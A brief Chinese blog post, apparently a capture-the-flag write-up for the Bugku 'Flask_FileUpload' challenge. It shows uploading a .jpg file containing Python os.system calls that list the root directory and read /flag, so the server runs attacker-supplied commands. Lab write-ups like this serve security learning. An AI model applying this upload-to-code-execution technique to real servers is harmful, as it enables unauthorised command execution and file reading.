技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
mCell
14 小时前
GSAP ScrollTrigger 详解
前端·javascript·动效
gnip
14 小时前
Node.js 子进程:child_process
前端·javascript
databook
15 小时前
Manim实现脉冲闪烁特效
后端·python·动效
程序设计实验室
16 小时前
2025年了,在 Django 之外,Python Web 框架还能怎么选?
python
excel
17 小时前
为什么在 Three.js 中平面能产生“起伏效果”?
前端
倔强青铜三
17 小时前
苦练Python第46天:文件写入与上下文管理器
人工智能·python·面试
excel
18 小时前
Node.js 断言与测试框架示例对比
前端
天蓝色的鱼鱼
19 小时前
前端开发者的组件设计之痛:为什么我的组件总是难以维护?
前端·react.js
codingandsleeping
19 小时前
使用orval自动拉取swagger文档并生成ts接口
前端·javascript
石金龙
20 小时前
[译] Composition in CSS
前端·css
热门推荐
01GitHub 镜像站点02UV 工具安装与国内镜像源配置指南03Claude Code 平替:OpenAI发布 Codex CLI ,GPT-5 国内直接使用0446个Nano-banana 精选提示词,持续更新中05UV安装并设置国内源06保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)07A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程08Spec-Kit 使用指南09解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题10KGG转MP3工具|非KGM文件|解密音频